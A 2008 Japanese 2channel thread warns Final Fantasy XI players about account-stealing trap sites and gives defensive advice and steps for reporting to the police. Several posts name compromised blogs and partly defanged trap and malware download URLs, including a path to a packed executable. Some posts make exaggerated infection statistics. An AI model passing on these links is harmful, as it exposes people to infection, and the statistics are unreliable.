無題ドキュメント

●●　RMT業者の垢ハックが多発している件13　●●

1 ：既にその名前は使われています：2008/03/11(火) 17:43:22.18 ID:JYRIBG0m: RMT業者が一般プレイヤーのID・パスワードを盗んで不正にログインし、
アイテムやギルを奪う事件についてのスレッドです。詳細は>>2-10くらい
前スレ→http://live27.2ch.net/test/read.cgi/ogame/1203055797/
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり)
ttp://ort.sakura.ne.jp/taisai/
FF11Warning（ハッキングに重点をおいて詳しくまとめてあります）
ttp://miku.a.orn.jp/miku2/
FFXI Virus問題まとめサイト（初心者さん向け）
ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★リアルタイムで被害に遭われている方へ★

まずサポセンに電話し、不正アクセスの被害にあっていると伝えましょう(本人確認の後、対処してくれます)
■スクウェア・エニックスインフォメーションセンター
　 TEL:0570-003-399(PHSからは03-5333-1860）
　月曜～金曜　11:00～19:00（土・日・祝・指定休日はお休み）
※サポセンが営業時間外の場合は、別アカウントを所持しているならそれでログインしてGMを呼ぶか、
　他にログインできるアカウントがない場合はサポセンが開いてから電話をすることになります。
2 ：既にその名前は使われています：2008/03/11(火) 17:44:06.37 ID:AOpE+QAw: ■アカウントハックとは
主に中国のRMT業者（※1）がFF11関係のサイト（blogや情報サイト等）にアカウント情報を吸い出せる
罠ツールを仕掛けたサイトアドレスを貼り、FF11プレイヤーにそれを踏ませることにより
IDとpassを盗んで不正にログインし、所持アイテムやギルをを奪ってしまう（※2）行為の事です。
ログイン時にパスワードも変更され利用者本人がログイン出来なくなることも多々あります。

奪われたアイテムは各鯖にいるアイテム販売用キャラ（※3）が競売や店売りしてる模様。

※1：blogへの書き込みIP、リンクで飛んだ先のHPアドレスの所持者を調べると中国な為
※2：アイテムを奪われるだけの人も居れば、サーバー移動させられてたりキャラが消されていたりと多種多様の報告があります。
※3：Luckshop等、確認できるだけで21の鯖にいる業者の販売担当キャラ。FFAHで履歴調べると色々分かります
3 ：既にその名前は使われています：2008/03/11(火) 17:44:34.21 ID:Iv9PIA0f: 自キャラのミスラが現実に現れた件について
4 ：既にその名前は使われています：2008/03/11(火) 17:45:10.21 ID:AOpE+QAw: ■予防と自衛が各プレイヤーに求められています。
被害に遭わないためにも各自でできる限りの防衛手段を身に着けておきましょう。
【公式より抜粋】

▼内容が不明なサイトにアクセスしない
　※blogのレスの名前部分(HPアド)にリンクをつけてリンクアドレスを見せないようにする手口もあります。
　絶対にリンクを押す前にアドレスを見る事

▼不明なサイトにあるソフトウェアのダウンロードを不用意に行わない

▼Microsoft Update(Windows Update)を定期的に実行し、Windowsを常に最新の状態に保つ
　※詳しくはマイクロソフト社の公式サイトを参照のこと。

▼利用しているWebブラウザーなどを定期的にアップデートして常に最新のプログラムを使用する

▼スクウェアエニックス社が使用を認めていない外部ツールを絶対に使用しない

▼ウイルス駆除ソフトを常に最新のバージョンで使用する
5 ：既にその名前は使われています：2008/03/11(火) 17:46:18.57 ID:AOpE+QAw: ■具体的な自衛策
１：ウイルススキャンソフトを導入する。
　　・シマンテック、カスペルスキー、マカフィー、トレンドマイクロ社のソフトを有料で購入する。
　　・AVG、AntiVir、avast!、BitDefenderなどの無料ソフトをダウンロードして使用するという手もあります。

２：WindowsUpdateでWindowsを最新の状態にする
　　　Windowsは最初にインストールしただけで万全というわけではなく、次々と発見されるセキュリティホールを
　　　後付で修正し、それをWindowsUpdateで配布することで安全性を保つようにできています。
　　　一般的には自動更新がされるよう設定されていますが、重いからという理由で自動更新機能を
　　　オフにしている人もいると思います。その場合は必ず定期的に手動で更新を行ってください。

３：ファイアウォールを有効にする
　　・１に上げた有料ソフト等に同梱されているものや、同じ会社から出ているものを使う

　　・ベクターや窓の杜などでフリーのファイアウォールソフトを探し、導入する
　　　(2chカテゴリ「ネット関係」＞「セキュリティ」板にフリーのファイアウォールソフトの
　　　　スレッドがあります。「ファイアウォール」などの単語で検索してください)
6 ：既にその名前は使われています：2008/03/11(火) 17:46:58.73 ID:AOpE+QAw: ■具体的な自衛策その2

４：IPフィルタを導入する
　　PeerGuardian2というフリーソフトで特定の国(この場合は特に中国)のIPへのアクセスを遮断できます

　　★PeerGuardian2の導入・設定方法はここから
　　　　リネージュ資料室 ttp://lineage.nyx.bne.jp/misc/security/id_basic-ipfilter.html
　　　　このURLを踏みたくない人はgoogleで『リネージュ資料室』で検索してメニューから
　　　　セキュリティー対策→IPフィルタ　で確認してください。

５：IE以外のウェブブラウザを使用する
　　Firefox、Opera、など。
　　ただしそれぞれのブラウザにもセキュリティホールが見つかることもあるので、
　　ブラウザ自体のアップデートも行う必要があります。

６：不審な・見覚えの無いＵＲＬを踏む必要がある場合は、まずaguse.jpやソースチェッカーを使用する。
　　ttp://www.aguse.jp/　
　　ＵＲＬを入力するとそのページのSSとドメイン情報、各ブラックリストに照らし合わせた結果が表示されます。
　　ソースチェッカーにはWebページ上のものと、DLして使用できるフリーソフトがあります。
7 ：既にその名前は使われています：2008/03/11(火) 17:47:30.36 ID:AOpE+QAw: ■もし被害に遭ってしまった場合
「ある日突然登録してあるパスワードでログインできなくなった」もしくは「ある日ログインすると
キャラクターのアイテムやギルが奪われていた」等の、不正アクセスと思しき被害にあった場合は、
まず>>1にあるサポセンの連絡先に電話してパスワードの再発行を受けたり、不正アクセスの被害を
受けたことを報告しましょう。

現時点(平成19年10月下旬)でのスクウェアエニックス社インフォメーションセンターの。不正アクセス被害者への
対応は、「社内の調査だけでは不正アクセスと断定することができない」という調査結果の報告のみです。

不正アクセスと断定できないとはつまり、「RMT業者に自発的にアイテムやギルを受け渡したのは
被害者本人である」ということにされている状態です。

この状態の打開及びさらなる追及を望むならば、警察への届出が必要になります。
不正アクセス行為の禁止等に関する法律、通称不正アクセス禁止法においては、
こういった事例での被害者は「不正アクセスをされた側」つまりスクウェアエニックス社になりますが、
アカウントを乗っ取られた側でも「利用権の侵害」として被害を届出することができます。
8 ：既にその名前は使われています：2008/03/11(火) 17:48:50.08 ID:AOpE+QAw: ■警察への通報方法
１：まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
　　都道府県警察本部のサイバー犯罪相談窓口等一覧
　　ttp://www.npa.go.jp/cyber/soudan.htm

２：相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
　　(この段階を踏まずに直接所轄署に行くと、「専門の窓口に連絡しろ」と言われてしまう可能性があります)

３：所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。

４：資料を持参して所轄の署に赴き、「利用権の侵害」での被害を報告します。
　　「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが、
　　家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
　　利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
9 ：既にその名前は使われています：2008/03/11(火) 17:49:19.26 ID:AOpE+QAw: ■警察へ行く際に持っていく・用意しておくもの
過去スレで実際に警察へ行った被害者のレスから抜粋

もっていったもの †
o スクエニの会社情報　ＨＰのプリントアウトしたもの
o プレイオンラインサポセンの電話番号
o 印鑑、身分証明
受け答えしてくれたサポセンの人の名前も伝えるといいかも

↑
警察で聞かれたもの †
o プレイオンラインのIDとパスワード
o キャラ名
o 犯行時間帯
o 被害内容(なくなったゲーム内通貨・アイテム)
o プロバイダ
10 ：既にその名前は使われています：2008/03/11(火) 17:49:44.74 ID:AOpE+QAw: ■このスレの目的
１：予防・自衛の徹底の周知
２：被害報告の収集
３：罠サイトURIの収集
４：被害者が現れた場合に対処をアドバイスする

★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください

☆「スクエニ社に法的責任を!」や「誰が悪いかランキング」、「被害者の会を作れ」等の議論も
この場で行ってくださって構いませんが、スレを見に来た一見さんの質問や被害者の報告は
無視せずに対応してください。
11 ：既にその名前は使われています：2008/03/11(火) 17:50:33.01 ID:AOpE+QAw: ■アカウントハックの救済について署名して下さい
ttp://www.petitiononline.com/FFvoice/petition.html
[Click Here to Sign Petition]=請願に署名して下さる方はこちらをクリックして下さい。

Name=名前(必須)　　Email Address=メール(必須)　　Real name=本名(任意)　　Server name=サーバー(必須)

Email Address Privacy Option=メールアドレスプライバシーオプション
:Private=署名妥当性確保のためのメールアドレスですプライベートでスクウェアに提供されません
:Available to Petition Author=プライベートですがスクウェアに提供されます
:Public=全ての人が閲覧可能です

[Preview Your Signature]=貴方の署名を確認します

View Signatures Without Signing=署名をしないで他の署名を見ます
12 ：既にその名前は使われています：2008/03/11(火) 17:50:50.91 ID:AOpE+QAw: 俺乙。テンプレ長いね
13 ：既にその名前は使われています：2008/03/11(火) 18:05:32.62 ID:C+oV/2In: いちょつ
14 ：既にその名前は使われています：2008/03/11(火) 18:12:18.13 ID:SF1kHfuz: いちおつ

※尚2月下旬から騒ぎになっているFC2ブログハックの件は>>5を全部実行しても防げないらしいです
15 ：既にその名前は使われています：2008/03/11(火) 18:13:45.82 ID:AOpE+QAw: 前スレで出た話

大きさ0のiframe(インラインフレーム)を
ブログ(のテンプレート)に仕込む手口が急増しています。
iframeを生で使えるブログは限られる(FC2、サーパラ等)と思いますが
ブログを持っている人は定期的にブラウザからソースを表示して
「iframe」で検索して確認してください。閲覧者をも危険に陥れます。
16 ：既にその名前は使われています：2008/03/11(火) 18:46:45.03 ID:jEZao5To: >>14
本当に？
17 ：既にその名前は使われています：2008/03/11(火) 18:57:24.04 ID:SF1kHfuz: 細かいことはわからんけど前スレにWindowsUpdate最新で
ノートンの更新もしててハクられたひとがきてたはず
18 ：既にその名前は使われています：2008/03/11(火) 19:06:30.21 ID:vM0vfCDE: >>5
これぐらいでは対応が甘いな。
とりあえず最近流行しているPOLパスワードを盗んでいくマルウェアに
例え感染しても被害を受けないためには
（実際>>5程度の生ぬるい対応では感染はまぬがれない）
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。
POLパスワードを登録保存せず、毎回手入力でログインするべし。

まぁ、これを全員が対策したところで、
今度はキーロガータイプのマルウェアが出てくるのが目に見えているんで
一時しのぎって意味合いしかないけどな。
19 ：既にその名前は使われています：2008/03/11(火) 19:09:54.85 ID:vM0vfCDE: てか、FFをしたいがために最近Windowsを使い始めたんだが、
すっごくセキュリティに気を使わないといけないんで
疲れるね。Windowsは。
Macならそもそもマルウェアなんかに感染しないし（註）、
Mac版のFF出してくれないかなぁ。

註「マルウェアなんかに感染しないし」について説明。
Macでも穴があるのは事実だが、
世の中に出回っているマルウェア、ウイルスの
99.999999999%がWindowsにしか感染しないタイプなので
事実上、Macはマルウェアに感染しないといっても過言ではない。
そこんところ現実をわかってないただのセキュリティオタクには
突っ込まれそうなんで一応補足しておく。
20 ：既にその名前は使われています：2008/03/11(火) 19:21:51.91 ID:pT4nTFvh: Windowsのウィルスが怖いなら
PS2使えばいいじゃない
21 ：既にその名前は使われています：2008/03/11(火) 19:22:20.00 ID:Tz2Htq51: なんかSM-DOS言ってる山岡が浮かんだ
22 ：既にその名前は使われています：2008/03/11(火) 19:34:56.28 ID:U/Nxor/m: 定期的にﾏｶｰが沸くなｗ
23 ：にゃにゃし：2008/03/11(火) 19:36:16.29 ID:yhBi+tsf: PeerGuardian2いれてたから
ペッテンに仕込まれたやつ回避したにゃ
ブロック遍歴いぱーい
24 ：既にその名前は使われています：2008/03/11(火) 19:52:45.13 ID:qSwvfR1A: FF11がMacでもできるようになったら
業者もMac用の罠作るんじゃないの
25 ：既にその名前は使われています：2008/03/11(火) 20:31:18.40 ID:pNZsw+0F: >>14
詳しく！
26 ：既にその名前は使われています：2008/03/11(火) 23:41:23.61 ID:ZgH4UdE+: >>24
今もってなおふさがれていない、RealPlayerの脆弱性を利用したトラップが、
fc2のブログをハックして仕掛けられていました。

fc2本体がハクられたのか、fc2ユーザーのアカウントがハクられたのかは不明なのですが、
テンプレート自体にいつのまにかiframeが仕込まれていたそうです。
27 ：既にその名前は使われています：2008/03/11(火) 23:41:56.22 ID:ZgH4UdE+: ちが、>>25のミスでした。
しかも保守のつもりが上がってねえ＿|￣|○
28 ：既にその名前は使われています：2008/03/12(水) 00:51:40.73 ID:qCE5oa54: otisugi
29 ：既にその名前は使われています：2008/03/12(水) 00:54:40.93 ID:JjezpGEV: >>19
Macが平和な時代も終わりつつあるようですよ。
自分だけは大丈夫というのが一番危ない。

Macウイルス監視サイトがMacマルウェア配信に加担？
http://ime.nu/www.itmedia.co.jp/enterprise/articles/0803/11/news033.html
30 ：既にその名前は使われています：2008/03/12(水) 00:56:21.77 ID:x9KGBS3N: ://vanamon■blog53■fc2■com/?overture
ヴァナモンブログに張ってあるこの広告踏んでも大丈夫？
日本企業だけど鯖は中国ってだけかしら。
31 ：既にその名前は使われています：2008/03/12(水) 01:10:54.20 ID:7RZ5ZGAT: >>30　たぶん、大丈夫。

overtureはYahoo!傘下の広告会社。
接続先（content.ysm.vip.jp2.yahoo.com, 124.108.65.97）は
APNIC管轄のIPアドレスなので、サーバの場所はアジア太平洋の
どこかだとしかいえない。aguseの地図は中国のど真ん中を指している
けど、よく見ると都市名は不明になってるでしょ。
tracerouteしても途中で切れるから保証はできないけど、日本国内に
あるサーバじゃないかな。
32 ：既にその名前は使われています：2008/03/12(水) 07:01:36.36 ID:MKZtSNNv: OvertureはGoogleで言えばGoogleAdsenseみたいな
米Yahoo!傘下のスポンサー広告を扱う企業。MSN等も使ってた。
審査は甘く、FFの中華罠サイトの元祖「花の雫FF11情報局」の広告を載せたことがある。
33 ：既にその名前は使われています：2008/03/12(水) 07:13:30.51 ID:MKZtSNNv: 今月のWindowsUpateはOfficeだけか…。1つも無かった。
34 ：既にその名前は使われています：2008/03/12(水) 07:26:52.72 ID:H8vRTpwr: 200台なのにsageんなよｗ
35 ：既にその名前は使われています：2008/03/12(水) 07:30:03.74 ID:MKZtSNNv: 前スレの終わり間際に出ていた、
サーパラブログに仕掛けられた物を再スキャン。
各社に検体を送付してから15時間経過。
ttp://www.virustotal.com/analisis/b1f0d3af89749ed3ea7cf1c9839555d2
36 ：既にその名前は使われています：2008/03/12(水) 07:30:34.71 ID:/4f/wP41: ここ見てるとfc2とサーパラ経由で引っかかってる人多そうだから\windows\system32\drivers\etc\hostsに
以下の行を追加して遮断したわ。遮断してもデメリットは特に無かった。

　127.0.0.1 www.surpara.com
　127.0.0.1 surpara.com
　127.0.0.1 www.fc2.com
　127.0.0.1 fc2.com

IE使うのとっくにやめてFirefox使っているんだが先日NoScriptなるadd-onをインストールしたけど
これ凄いわ。Java,Flash,<IFRAME>,Silverlight,その他プラグインをまとめて遮断してくれる。
ただこれだと見えないページが多いからどうしても見たいサイトは一時的に例外処理とかもできる。
導入方法はFirefoxのメニューからツール→アドオン→新しい拡張機能入手から[NoScript]を検索すればok
37 ：既にその名前は使われています：2008/03/12(水) 07:34:53.40 ID:QBfcOaT2: >>29
第三者的な視点でマカーが安心だとは言えないのはわかるが、昔からその手の話はたくさんあって今にいたってるからマカーはもう麻痺してる。
ウィンドウズPCと比べてシェアが100倍くらい違うから業者ちゃんが見向きもしない。
38 ：既にその名前は使われています：2008/03/12(水) 07:35:43.92 ID:M7OuaZr3: 　　　　.ｲ: :死: : 死: : ;v:怨念 : 死ヽ: :ヽ　　　　　　
　　　　　/: :ｲ: :死; ;/ヽ; ; ;i: :怒:ｲ: :|　　　　　　ぼくちゃんはOdinのGamblianですｗｗｗｗｗｗｗｗ
　　　　　|/:釘:/::/怒v　怨 |:/V､:/: ::|　　　　　　
　　(ヽ　ｲ:/(|((死　)).死　'呪ﾟ)):怨:|　　/)　　
　　(((i)　 |: ; |:⌒釘､｡｡.　 ⌒:ｲ呪ゝ　(i)))　　カンパニエでイナゴをMPKしていますｗｗｗｗｗｗｗｗｗｗｗｗ
　／死／　　'´'ヽ,　|r死┬-|呪./死´'´　_＿ゝ.＼
(＿死￣￣呪　:ｰ|　死　 |　呪⌒￣._＿＿＿）
　　　　￣ﾐヽ　・..　`ー死´　呪..･　/ﾐ　　　　　誰の目にも届かないほど遠くでキープしていますｗｗｗｗｗｗｗｗ
　　　　　　ﾉ釘　u　死　　　　呪｜
　　　　　／　死　　釘　怒　死　ﾉ　　　　　　　
　　　　/　　釘怨　　　+死　　...∠＿
　　　 |　 u f＼　..死::;;;:::...　　ﾉ　　￣ヽ　　　イナゴが寄ってきたら自分だけ逃走しますｗｗｗｗｗｗ
　　　 | 怨念|　　ヽ（∪）ﾉー─死､.　死　）
　　／　　.ﾉ　　　　　　　　　　　| 怨　 /　　　
　 / u ／　　　　　　　　　　　 |　../
..ノ死／　　　　　　　　　　　　　ﾉ　〈　関係ないけどサチコメに「採掘で横掘りされたらやり返すお！」って書いたことありますｗｗｗｗｗｗ
39 ：既にその名前は使われています：2008/03/12(水) 07:49:41.36 ID:s8TSxoBN: POLパスワードを登録しないで毎回入力してはいってもハックされましたよ～
40 ：既にその名前は使われています：2008/03/12(水) 07:56:29.35 ID:MKZtSNNv: >>36
www.fc2.com
fc2.com
これブロックしても意味ねーぞ。
なんちゃら.blogなんちゃら.fc2.com の形式なので。
で、hostsに*.fc2.comみたいな指定はできないので
ファイアウォールなどで指定するしかない。

あとNoScriptがすげーと言っても
そもそもFxデフォルトでiframeを切ることができない
(IEやOperaは切れる)ので、まーどっちもどっちだ。
41 ：既にその名前は使われています：2008/03/12(水) 09:08:48.71 ID:xTjGFHD7: MacBook Proで基本はほとんどMacOSXで仕事とプライベートをこなしている。
Windowsはほとんど使ったことなかったが、
FFをしたいがためにMacBook ProにWinXPをインスコした。
Winで起動するのはFFするときだけって感じ。

IEやめてFirefoxにしたが、それだけじゃまずいときいて
NoScriptをさっそくいれてみた。
いろいろブロックしてくれて安心のような気もしますが、
同時にいろいろデホではみれなくなって使いにくくなりました。

だいたいMacなら感染のことなどなにも考えずにWebブラウズできるのに
Winという環境を生きていく上にはいろいろと気を使うんですな。
Winで仕事やプライベートまでやってるやつらがかわいそうになってくるが、
まぁそいつらのおかげでMacな俺は幸せに生きていけるわけで、
それはシェアの少ない環境のおかげなのだから
そいつらはいつまでもWinな環境で生きていってほしいと願う。
間違ってもMacなら気を使わずに暮らしていけるときいて
Macにすっ飛んできますた！！などということはやめてほしい。
おれが幸せに生きていくために。
42 ：既にその名前は使われています：2008/03/12(水) 09:12:04.88 ID:iekwPtMo: で、どこを縦読みすればいいんだ？
43 ：既にその名前は使われています：2008/03/12(水) 09:13:30.21 ID:xTjGFHD7: そうだな、例えると
大雨の中を傘さして歩くか（Win)、
晴天の下を傘なしで歩くか（Mac)って感じかな。気分的に。
それでもわからんやつにもっと例えると、
戦争中の機銃掃射の中を防弾チョッキで完全防備して暮らすか、
平和な国の街中を普段着で歩くか、
そんな感じに思える。

実際、Macずっと使ってるが一度もアンチウイルスソフトなど
入れたこともないし、被害にあったこともない。
そんな感覚でWinを使い始めた俺もバカだったが、
先日FFの垢ハックされたときからいろいろとWin上のセキュリティに
気を使うようになって、そのときに感じたのが上記の例。
44 ：既にその名前は使われています：2008/03/12(水) 09:15:09.30 ID:QBfcOaT2: 縦読み出来ない、俺にはピーキー過ぎるのかも
45 ：既にその名前は使われています：2008/03/12(水) 09:22:53.54 ID:Hmy7ced0: 最近のMacは、WinXPをインスコできるのか？？？
Macにも昔からウィルスあったぞ
ノートン先生すらいれてなかったのか？？？
こいつ謎すぎる
46 ：既にその名前は使われています：2008/03/12(水) 09:26:55.34 ID:MKZtSNNv: 要約
ウイルスにも相手にされないMacOSX
47 ：既にその名前は使われています：2008/03/12(水) 09:47:02.65 ID:xTjGFHD7: >>45
ヒント　車運転で死ぬ確率　0.001%
　　　　Macで感染する確率（無対策）　0.0000001%
　　　　Winで感染する確率（無対策）　99.99999%

車で死ぬのが怖いからって、車運転しない人はいないだろ。
Macで感染するのが怖いからって、（ｒｙ

ちなみに、最近のMacは全部Winがnative稼働する。デフォで。
もちろんWinOSは別途購入する必要があるが。
Mac/Winの切り替えは再起動な。
48 ：既にその名前は使われています：2008/03/12(水) 09:49:55.83 ID:0FX8XGs8: ハックされてはや4ヶ月。。。
スクエニからも報告がない。。。
仕事しやがれう゛ぉけがあ！
49 ：既にその名前は使われています：2008/03/12(水) 09:51:50.58 ID:MKZtSNNv: >>45
今のIntelCPU(Core2等)搭載MacのPCとの差は極端な話、BIOSが載っていないだけ。
それをエミュるのがLeopard(OSX 10.5)に付いてくるBootCamp。
BootCampがあればXPだろうがVistaだろうが動作する。

IntelMacはBIOSが無いのに誰がOS起動までの面倒見るのかというと
BIOSの代わりにEFIが載っている。
EFIはIntelとMicrosoftが提唱した次期BIOSとも言える物だけど、
PCマザーボードではあまり普及していない
(そのためVistaでもサポートを中止した)。
IA64版があるServer2003やServer2008ならサポートされる。
IntelMacは初のEFI対応PCとも言える。

とageつつ無駄話。
50 ：既にその名前は使われています：2008/03/12(水) 09:54:14.12 ID:xTjGFHD7: >>49
BootCampときいて/dance2と打ち込んでしまいますたｗ
51 ：既にその名前は使われています：2008/03/12(水) 09:55:44.18 ID:MKZtSNNv: そうそう、今のMacの価格はスペックからすると
メーカのPCにオプションでハイエンドビデオカード付けるより
安かったりする。もちろんFFも俺のヘボ自作PCよりガンガン動く。
貧者のWindowsPC、と言ったら言い過ぎかｗ
52 ：45：2008/03/12(水) 10:05:33.83 ID:Hmy7ced0: そうなんだ、勉強になったわ
自分、仕事でmac使ってるけど
最近のmac事情には疎かった
53 ：既にその名前は使われています：2008/03/12(水) 10:14:38.35 ID:MKZtSNNv: ちなみにBootCampにWindowsドライバも付属する。…が。
たとえばMacのキーボードに「半角/全角」キーが無いので
「IMEオンにできなくて日本語打てねー！！１！！ｗｗｗうぇｗｗｗ」とか
まれによくあるのでその辺はキーを入れ替えるユーティリティを
各自拾ってどうにかしてください。

なお逆はできない(WindowsPCでMacOSXが動くわけではない)。
54 ：既にその名前は使われています：2008/03/12(水) 10:17:54.47 ID:MKZtSNNv: なんか脱線してもうた。
通報したサーパラブログはごっそり消えた模様。
55 ：既にその名前は使われています：2008/03/12(水) 10:41:08.85 ID:pKFUq6Mz: 今回のリアルプレイヤーみたく、アプリ側の穴が開いたまんまで亜種作られると

誰かが通報→検体提出→アンチウイルスソフト対応

までの間WinUpateしてようがアンチウイルスソフト自動更新してようがどうしようもないからね
今回のFC2の奴はかなり亜種を作りやすいプログラムらしい
56 ：既にその名前は使われています：2008/03/12(水) 10:53:28.52 ID:MKZtSNNv: RealPlayer関連。

RealPlayerのActiveXコントロールにパッチ未提供の脆弱性
ttp://internet.watch.impress.co.jp/cda/news/2008/03/11/18762.html
脆弱性はRealPlayer 11.0.1（build 6.0.14.794）で確認されたほか、
他のバージョンにも影響があると推測されている。

えーと。日本語版は6.0.14.748が最新なので
去年の穴すら開いたままでございます。
57 ：既にその名前は使われています：2008/03/12(水) 11:24:38.69 ID:pKFUq6Mz: >FF11　ビシージ衛生兵視点「五蛇将編」‐ニコニコ動画(RC2)
>http://ime.nu/maplestorfy■w16ｓ核okwit■com/kurubusi/sityounew■html
>（注：要会員登録の動画サイト。

>なんというか、将軍の貴重な技や組み合わせがあって

>ビシージ好きにはたまらない動画です）

まったく疑わずに踏んでしまった・・・
ノートン先生にめっさ怒られたよ・・・

なんか流暢な日本語で、流れの中にすぅーっと貼られると
ぜんぜんダメだわ・・・どうしたもんかね、コレ
58 ：既にその名前は使われています：2008/03/12(水) 11:30:58.34 ID:44EgVWLN: >>57
これだけ注意喚起の書き込みがあるのに
ぽんぽん踏むんじゃどうしようもないだろ
59 ：既にその名前は使われています：2008/03/12(水) 11:41:41.31 ID:pKFUq6Mz: >>58
将軍の貴重な技動画見たかったんだよ( ´口`)
分かってるよ、オレがバカなのぐらい
60 ：既にその名前は使われています：2008/03/12(水) 11:43:33.98 ID:MKZtSNNv: >>57
流暢もなにもコピペだし
61 ：既にその名前は使われています：2008/03/12(水) 11:44:12.69 ID:etj9uPxt: >>57の動画のうｐ主が罠サイト誘導のネタに使われたなんて知ったら、かわいそうに・・・
中国業者はほんとろくな事しない・・・
62 ：既にその名前は使われています：2008/03/12(水) 11:44:47.98 ID:EfIH6CoN: 流暢もなにもほんとのビシージ動画についてた説明文のコピペだな
とりあえずまっぶるすとーふぃをNGに入れておいたらいいんじゃないの
63 ：既にその名前は使われています：2008/03/12(水) 11:55:14.41 ID:MKZtSNNv: >>57
起動するRealPlayerはダミー。iframeで仕込みあり。
maplestorfy■w16■okwit.com/xin/xia.exe
Upackで固められていて何をするのかはわからんけど
1月製造の物なのでだいたい検知する模様。
ttp://www.virustotal.com/analisis/b70e52ee387eacbf26708df41e3ff62e
64 ：既にその名前は使われています：2008/03/12(水) 12:13:35.00 ID:jtGbFtiy: ニコニコへのリンクなんだから、niconicoがＵＲＬに入ってない時点でアウアウｗ
65 ：既にその名前は使われています：2008/03/12(水) 12:17:56.34 ID:MKZtSNNv: IE 5とIE 6にCSRFの脆弱性
ttp://www.itmedia.co.jp/enterprise/articles/0803/12/news014.html
ようこそIE7へ! IE8Beta1もあるよ!
66 ：既にその名前は使われています：2008/03/12(水) 13:18:32.52 ID:U1rLcd9C: >>57
本物の動画はニコニコのsm2384170にあるみたいだ。
ノートン先生がいてくれて良かったな、一応他のオンラインスキャンも試したほうが安心かも
67 ：既にその名前は使われています：2008/03/12(水) 14:45:46.16 ID:etj9uPxt: PG2入れてみたけど、有名ブログ２，３こしかまわってないと思ったのに韓国IPブロックしてた。
・・・どこに何があるかわからないですね
68 ：既にその名前は使われています：2008/03/12(水) 14:52:01.82 ID:pKFUq6Mz: >>66
さんくすこ見てくる
とりあえずこのPCでFFやってないから垢ハックは大丈夫だと思う
すぱいうぇあとか怖いから別のも試してみるよ、ありがと
69 ：既にその名前は使われています：2008/03/12(水) 14:52:47.76 ID:HMQPvftt: >>59
まあ、でも気持ちはわかるｗ

向こうもそういうところねらってるんだろうけどなあ
70 ：既にその名前は使われています：2008/03/12(水) 14:58:02.03 ID:etj9uPxt: >>68
キキルンヴァージョンもうｐされてたよｗ
71 ：既にその名前は使われています：2008/03/12(水) 16:01:16.31 ID:ZIXRWN6n: ニコニコ
72 ：既にその名前は使われています：2008/03/12(水) 16:02:44.56 ID:mK9JP7mk: >>67
その有名ブログ２，３個ってどこなのかな？
73 ：既にその名前は使われています：2008/03/12(水) 16:18:40.85 ID:MKZtSNNv: 戦士スキーさんのとこまた改ざんされたのか…。
ffxiwar.blog91.fc2.com/blog-entry-221.html
とりあえずスクリプトを解読して検体を入手、各社に提出は終わった。
ちょっと出かけるのでまとめは後ほど。
74 ：既にその名前は使われています：2008/03/12(水) 16:28:25.73 ID:5ueP+uYF: >73
今回の新型だったの？
75 ：既にその名前は使われています：2008/03/12(水) 16:44:39.83 ID:O7It2Xdp: ３月頭からのテンプレートハックに遭ったブログって他にどこだろ
原因がブログ主が罠サイト踏んだ以外の個人ミス以外なら
被害に遭った所とそうでない所を比較検討してみたら少し見えてこないだろうかね
ここ詳しい人多そうだし
76 ：既にその名前は使われています：2008/03/12(水) 16:50:16.23 ID:MKZtSNNv: >>74
うむ。ひどいありさまだ。
スキャン ttp://www.virustotal.com/analisis/074714fbc0a0ce7af4d12d9caf5fea94
77 ：既にその名前は使われています：2008/03/12(水) 16:54:41.24 ID:etj9uPxt: ブログと違ったら失礼と思って確かめにいったけど、fc2じゃなかった::(ヽ'ω`): : どこから流れてきたんだろう
有害スクリプト有りってでたのはアダルト広告がひっかかっただけっぽいし
（↑アダルトサイトじゃなくて、アダルト同人誌とか商業誌だしてる個人サイトさん）
78 ：既にその名前は使われています：2008/03/12(水) 16:54:45.43 ID:MKZtSNNv: >>75
把握しているのはFFXI系で4つ、ぺってん、戦士スキー、黒猫奮闘記、某青魔道士。
でも今回のもLineage2トロイなので他のジャンルのブログでもありそうだけど。
79 ：既にその名前は使われています：2008/03/12(水) 17:01:32.45 ID:5ueP+uYF: >76
おいおい>73のところ新型をバラまいてたのかよ・・・
80 ：既にその名前は使われています：2008/03/12(水) 17:02:19.06 ID:Sd6cj8cL: この状況に対してスクエニがSTTレポートでテンプレ発言を月一でしかしないのはどうかと。
ネカフェから繋いだら不正アクセスの捜査ができなくなる恐れがある、くらいは公式TOPに載せろよ。
81 ：既にその名前は使われています：2008/03/12(水) 17:05:25.11 ID:mK9JP7mk: >>78
有名ブログどころ（？）をあまり把握していない自分は
それだけじゃどこか分からないわ…
82 ：既にその名前は使われています：2008/03/12(水) 17:12:23.10 ID:MKZtSNNv: petsoro.blog91.fc2.com/blog-entry-176.html
でも情報あった。某青魔道士さんとこもまたやられて閉鎖だそうだ。
www16.ocn.ne.jp/~ff11blue/

>>81
ググれば出るキーワードにしたつもりなんだが…。
83 ：既にその名前は使われています：2008/03/12(水) 17:13:13.22 ID:202cagxd: トレンドマイクロのウイルス情報ページが改竄、ウイルスを埋め込まれる
http://ime.nu/internet.watch.impress.co.jp/cda/news/2008/03/12/18775.html
84 ：既にその名前は使われています：2008/03/12(水) 17:22:26.63 ID:MKZtSNNv: >>83
おいおい…さすが台湾ウイルスバスター…
85 ：既にその名前は使われています：2008/03/12(水) 17:26:18.05 ID:mK9JP7mk: >>82
ごめんよ
ググれば良かったのか、悪かった。
86 ：既にその名前は使われています：2008/03/12(水) 17:35:01.47 ID:etj9uPxt: OCNかぁ・・・
87 ：既にその名前は使われています：2008/03/12(水) 18:02:22.09 ID:MKZtSNNv: スクリプトがどうなっているか書こうとしたけどめんどいのでやめた
